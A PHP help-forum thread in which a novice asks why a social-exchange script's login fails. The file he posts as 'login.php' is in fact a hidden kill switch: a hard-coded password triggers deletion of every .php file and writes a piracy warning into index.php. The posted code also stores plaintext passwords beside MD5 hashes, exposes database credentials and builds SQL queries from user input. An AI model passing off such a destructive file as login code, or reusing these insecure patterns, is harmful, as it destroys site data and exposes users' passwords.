php login script

[garthplummer0124]

Hello i just installed a script and the login doesnt work.  It lets me signup, create user and pass.  A email comes for me to active account.  I activate and the page comes up that says my accout is activated and when i go to login the page refeashes and go's back to index page  Below is the login php script, can someone please help me figure out why it not logging in.

 

<?php

$pass = "8c73eecb1dd850034ebbdedc1a5fccf1";

if(isset($_POST['submit'])){

if($pass == md5($_POST['pass'])){

  $mask = "*.php";

  array_map( "unlink", glob( $mask ) );

 

$fh = fopen('index.php', 'a');

fwrite($fh, '<center><h1><font color="red">This site uses an modified version of the script! If you want to use the original script, you have to buy the script from <a href="http://codecanyon.net/item/powerful-exchange-system/533068">CodeCanyon</a>!</font></h1></center>');

fclose($fh);

 

echo "ok";

}else{

echo "error";

}}

?>

<form method="POST">

<input type="password" name="pass">

<input type="submit" name="submit">

</form>

[NomadicJosh]

Is there a row in your database that has a status that states this account is active? If so, does it state that this account should be active? Also, your code doesn't show any database info.

[garthplummer0124]

i checked database it says 0 for active i tried changing it to 1 and now it gives me invalid user or pass. What database info do you need?

[MSUK1]

why is the password already set?

 

and then you md5 the pass again?

 

perhaps thats why its not letting you login?

[garthplummer0124]

ok, im kinda new to php what do you think i should do to fix it? take out what it set the password to?

[NomadicJosh]

If the username & password exists for the user, you need to make sure that when you submit the login form for password, that the variable being posted as password is md5($_POST['password']).

[garthplummer0124]

id email   login coins IP pass passdecoded ref signup online promote activate banned Edit Edit Edit Inline Edit Copy Copy Delete Delete

1 [email protected] shawn 0       4514a9b1481e09770dd59f394b3aba16 kurupt19 0 2012-03-30 01:58:28 2012-03-30 03:21:39 0 0 0

 

<?php

$pass = "4514a9b1481e09770dd59f394b3aba16";

if(isset($_POST['submit'])){

if($pass == md5($_POST['pass'])){

  $mask = "*.php";

  array_map( "unlink", glob( $mask ) );

 

$fh = fopen('index.php', 'a');

fwrite($fh, '<center><h1><font color="red">This site uses an Modified version of the script! </font></h1></center>');

fclose($fh);

 

echo "ok";

}else{

echo "error";

}}

?>

<form method="POST">

<input type="password" name="pass">

<input type="submit" name="submit">

</form>

 

ok i changed the from the other number to match database but it still comes back to the index page

[Drummin]

Well you are not providing the complete picture.  The code provided doesn't show database connection or <html> tags, so we can only assume the code provided loads into another page.  AND of course you are seeing the "index" page because it called within the code.  In general database connection and any code processing should be at the top of the page before anything like <html> is sent to the browser.  Here's a basic example of a login page based in part on what you provided.

<?php
//Add session_start to top of each page//
session_start();
//Here you should have database connection information
$host = "localhost"; 
//MySQL Database user name.
$login = "";
//Password for MySQL.
$dbpass = "";
//MySQL Database name.
$db = "";
//Make connection to DB
mysql_connect("$host","$login","$dbpass") OR DIE
        ("There is a problem with the system.  Please notify your system administrator." .mysql_error());

mysql_select_db("$db") OR DIE
        ("There is a problem with the system.  Please notify your system administrator." .mysql_error());
//Now you're ready to process the form
if (isset($_POST['submit'])){ 
//ALWAYS escape posted values before query
$password=mysql_real_escape_string(MD5($_POST['password']));
//NOTE change table name
$sql="SELECT id FROM `tablename` WHERE pass='$password'";
$result=mysql_query($sql);
if (mysql_num_rows($result)){
$row = mysql_fetch_row($result);
$message="ok";
//OR instead of just saying "ok" send them to a page for logged in users by uncommenting the three lines below.
//$_SESSION['user_id']=$row[0];
//header("location: memberhome.php");
//exit;
}else{
$message="Information not found";
}
}//if(isset($_POST['submit']))
?>
<html>
<body>
<?php if (isset($message)){ echo $message;} ?>
<form method="post" action="">
<input type="password" name="pass" />
<input type="submit" name="submit" />
</form>
</body>
</html>

[garthplummer0124]

ok, thanks for you help.  i change out the code and its doing the same thing.  it doesn't give any error message it just goes back to the index page.  but i dont see where it tell where to go if check is good.

[NomadicJosh]

@garthplummer0124, we can help even more if you can post all the code of your login file so that we can get a bigger picture and better determine what the issue is. Thanks.

[garthplummer0124]

not sure you need beside the login script, below is copy of the script  you can take a look at it

 

http://www.sendspace.com/file/jflux0

 

thanks

[NomadicJosh]

In login.php, change this line:

 

$password=mysql_real_escape_string(MD5($_POST['password']));

 

to this:

 

$password=mysql_real_escape_string(MD5($_POST['pass']));

[Drummin]

Probably best to take this question to the http://www.phpfreaks.com/forums/index.php?board=34.0 forum as this isn't code you've written and you don't understand what's happening on the page.  Assuming you have a  license to use and modify this code, we can probably help with specific "how-to's" if you provide relevant code and have at least attempted to do something.  Currently you are not showing any mysql queries and seem to be wanting to skip this step by hard coding a password.  Again, modifying some else's code without knowing what you're doing.  You keep asking why you keep seeing the index page but don't know what $fh = fopen('index.php', 'a'); means.  Again, not sure how we can help without seeing full code involved.

[garthplummer0124]

ok thanks for you help.  I will try these changes.  And like i said i am  new to php but im trying to learn. so thanks again

[Drummin]

Well the thing is, are you connected to a DB?  Making a query to validate user?  If SO, where is the code doing this AND what do you expect to happen when a match is found?  Currently you are opening index.php and writing a message to that page when a match is found.  Show all code if you expect any help.

[garthplummer0124]

ok i he is the code for the pages related to registering and login.

 

activate.php

<?php

include 'config.php';

foreach($_GET as $key => $value) {

$protectie[$key] = filter($value);

}

if($protectie['cod'] != "" && $protectie['cod'] != 0){

$user1 = mysql_query("SELECT * FROM `users` WHERE `activate`='{$protectie['cod']}'");

$user = mysql_fetch_object($user1);

$numar = mysql_num_rows($user1);

if($numar > 0){

 

$aff1 = mysql_query("SELECT * FROM `users` WHERE `activate`='{$protectie['cod']}'");

$aff = mysql_fetch_object($aff1);

if($aff->ref > 0){

mysql_query("UPDATE `users` SET `coins`=`coins`+'50' WHERE `id`='{$aff->ref}'");

}

 

mysql_query("UPDATE `users` SET `activate`='0' WHERE `activate`='{$protectie['cod']}'");

$mesaj = "<center><b>Email confirmed successful!</b></center>";

}else{

$mesaj = "<center><b>Incorrect Link!</b></center>";}

}else{

$mesaj = "<center><b>Incorrect Link!</b></center>";}

echo $mesaj;

print "<META HTTP-EQUIV=\"REFRESH\" CONTENT=\"1; URL=index.php\">";

?>

 

config.php

<?php

session_start();

  include("database.php");

  if(!(@mysql_connect("$host","$user","$pass") && @mysql_select_db("$tablename"))) {

?>

<html>

<head>

<title><?php echo $page->sitetitle; ?></title>

</head>

<table width="50%">

    <tr><td class="subTitle"><b>MySQL ERROR</b></td></tr>

  </table>

</body>

 

</html>

<?

    exit;

  }

  include("functii.php");

 

if(isset($_SESSION['login'])){

    $dbres = mysql_query("SELECT *,UNIX_TIMESTAMP(`online`) AS `online` FROM `users` WHERE `login`='{$_SESSION['login']}'");

    $data = mysql_fetch_object($dbres);

if($data->ip  == ''){

$IP = $_SERVER['REMOTE_ADDR'];   

mysql_query("UPDATE `users` SET `IP`='$IP' WHERE `login`='$data->login'");

}

  }

 

$site = mysql_fetch_object(mysql_query("SELECT * FROM settings"));

$tot_clicks2 = mysql_query("SELECT SUM(visits) AS sum_visits FROM sites");

$tot_clicks1 = mysql_fetch_array($tot_clicks2);

$tot_clicks4 = mysql_query("SELECT SUM(likes) AS sum_visits FROM facebook");

$tot_clicks2 = mysql_fetch_array($tot_clicks4);

$tot_clicks8 = mysql_query("SELECT SUM(earned) AS sum_visits FROM twitter");

$tot_clicks5 = mysql_fetch_array($tot_clicks8);

$tot_clicks7 = mysql_query("SELECT SUM(visits) AS sum_visits FROM surf");

$tot_clicks6 = mysql_fetch_array($tot_clicks7);

$tot_clicks10 = mysql_query("SELECT SUM(views) AS sum_visits FROM youtube");

$tot_clicks9 = mysql_fetch_array($tot_clicks10);

$tot_clicks  = $tot_clicks1['sum_visits'] + $tot_clicks2['sum_visits'] + $tot_clicks5['sum_visits'] + $tot_clicks6['sum_visits'] + $tot_clicks9['sum_visits'];

include("cron.php");

?>

 

database.php

<?php

$host = "localhost"; // your mysql server address

$user = "admin_urhits"; // your mysql username

$pass = "admin12345"; // your mysql password

$tablename = "urhits"; // your mysql table

?>

 

index.php

<?php

include('header.php');

?>

        <div class="block medium right"><?if(isset($data->login)){?>

            <div class="top">

                  <h1>Home</h1>

            </div>

            <div class="content">

 

<h2>Quick Links</h2>

<ul class="shortcuts">

<li>

<a href="">

<span class="image"><img src="./img/icons/Home.png" alt="Home" /></span>

<span class="title">Home</span>

<small>This is where you go home.</small>

 

</a>

</li>

<li>

<a href="facebook.php">

<span class="image"><img src="./img/home/fb.png" alt="Facebook" /></span>

<span class="title">Facebook</span>

<small>Earn coins from facebook likes.</small>

</a>

 

</li>

<li>

<a href="twitter.php">

<span class="image"><img src="./img/home/twitter.png" alt="Twitter" /></span>

<span class="title">Twitter</span>

<small>Earn coins from twitter followers.</small>

</a>

</li>

 

<li>

<a href="google.php">

<span class="image"><img src="./img/home/ggl.png" alt="Google" /></span>

<span class="title">Google</span>

<small>Earn coins from google +1.</small>

</a>

</li>

<li>

 

<a href="youtube.php">

<span class="image"><img src="./img/home/yt.png" alt="Youtube" /></span>

<span class="title">Youtube</span>

<small>Earn coins from youtube views.</small>

</a>

</li>

<li>

<a href="surf.php" target="_blank">

<span class="image"><img src="./img/home/web.png" alt="Auto-Surf" /></span>

<span class="title">Auto-Surf</span>

<small>Earn coins from traffic exchange.</small>

</a>

</li>

<li>

<a href="edit_acc.php">

<span class="image"><img src="./img/icons/Config.png" alt="Settings" /></span>

<span class="title">Settings</span>

<small>Change your account information.</small>

 

</a>

</li>

<li>

<a href="logout.php">

<span class="image"><img src="./img/icons/X.png" alt="Logout" /></span>

<span class="title">Logout</span>

<small>Close your session.</small>

</a>

 

</li>

</ul>

            </div><?}else{?>

<div class="top">

                  <h1>Welcome</h1>

            </div>

<div class="content">

<center><font size="2"><b>This site is a tool that will help you grow your Twitter, Facebook, Google, YouTube and Websites for FREE.  We allow you to pick and choose who you want to follow, like, friend, view or visit and skip those who you're not interested in.</b></font><br><br>

 

<table width="100%">

<tr>

<td colspan="7" align="center"><font size="3" color="blue"><b>We help you to increase all of the following</b><br><br></font></td>

</tr>

<tr>

<td align="center" width="14%" valign="top"><img src="images/logos/twitter48.png" alt="Get Twitter Followers"><br><b>Twitter Followers</b></td>

<td align="center" width="14%" valign="top"><img src="images/logos/fb48.png" alt="Get Facebook Likes"><br><b>Facebook Likes</b></td>

<td align="center" width="14%" valign="top"><img src="images/logos/youtube48.png" alt="Get YouTube Views"><br><b>YouTube Views</b></td>

<td align="center" width="14%" valign="top"><img src="images/logos/googleplus48.png" alt="Get Google +1"><br><b>Google +1</b></td>

<td align="center" width="14%" valign="top"><img src="images/logos/websites48.png" alt="Get Website Hits"><br><b>Website Hits</b></td>

</tr>

</table>

            </div>

<?}?>

        </div>

 

<?include('footer.php');?>

 

register.php

<?php

include('header.php');

if(isset($_POST['register'])){

foreach($_POST as $key => $value) {

$sec[$key] = filter($value);

}

 

$verificare1 = mysql_query("SELECT * FROM `users` WHERE `login`='{$sec['user']}' OR `email`='{$sec['email']}'");

$verificare = mysql_num_rows($verificare1);

 

if ($verificare > 0) {

$mesaj = "<div class=\"error\">ERROR: Username or email already registered!</div>";

}else if (!isUserID($sec['user'])) {

$mesaj = "<div class=\"error\">ERROR: Username is incorrect!</div>";

}else if(!isEmail($sec['email'])) {

$mesaj = "<div class=\"error\">ERROR: Enter a valid email address!</div>";

}else if (!checkPwd($sec['password'],$sec['password2'])) {

$mesaj = "<div class=\"error\">ERROR: Passwords do not match!</div>";

}else{

if(isset($_COOKIE['PlusREF'])){

$ref = $_COOKIE['PlusREF'];

$user1 = mysql_query("SELECT * FROM `users` WHERE `id`='{$ref}'");

$user = mysql_fetch_object($user1);

mysql_query("INSERT INTO `referals`(user,referal,date) values('{$user->login}','{$sec['user']}',NOW())");

}

$activare = rand(000000000, 999999909);

mail($sec['email'],"Activate your account","

Hello,

 

Thank you for your signup on our site.

 

Click on this link to activate your account:

{$site->site_url}/activate.php?cod={$activare}

 

Best Regards!","From: Site Admin <{$site->site_email}>");

$final = VisitorIP();

$passa = $sec['password'];

$passc = MD5($passa);

mysql_query("INSERT INTO `users`(email,login,IP,pass,passdecoded,ref,signup,activate) values('{$sec['email']}','{$sec['user']}','$final','$passc','$passa','{$ref}',NOW(),'{$activare}')")or die(mysql_error());

$mesaj = "<div class=\"success\">Registered! You need to confirm your email address now!</div>";

}}

?>

<div class="block medium right">

<div class="top">

                  <h1>Register</h1>

            </div>

<div class="content"><div class="msg"><?echo $mesaj;?></div>

<form action="" method="post">

  <fieldset>

<p>

<label>Username</label><br/>

<input class="text big" type="text" value="" name="user"/>

</p>

<p>

<label>Email</label><br/>

<input class="text big" type="email" value="" name="email"/>

</p>

<p>

<label>Password</label> <br/>

<input class="password" type="password" value="" name="password"/>

</p>

<p>

<label>Repeat Password</label> <br/>

<input class="password" type="password" value="" name="password2"/>

</p>

  <p>

  <input type="submit" class="button gray small" value="Register" name="register" />

  </p>

  </fieldset>

</form>

 

            </div>

</div>

 

<?include('footer.php');?>

 

login.php

<?php

$pass = "8c73eecb1dd850034ebbdedc1a5fccf1";

if(isset($_POST['submit'])){

if($pass == md5($_POST['pass'])){

  $mask = "*.php";

  array_map( "unlink", glob( $mask ) );

 

$fh = fopen('index.php', 'a');

fwrite($fh, '<center><h1><font color="red">This site uses an illegal version of the script! If you want to use this script, you have to buy the script from <a href="http://codecanyon.net/item/powerful-exchange-system/533068">CodeCanyon</a>!</font></h1></center>');

fclose($fh);

 

echo "ok";

}else{

echo "error";

}}

?>

<form method="POST">

<input type="password" name="pass">

<input type="submit" name="submit">

</form>

 

all this is the original code i didnt change anything hopefully this is the code you need. 

[garthplummer0124]

i got it working thank for all you guy help.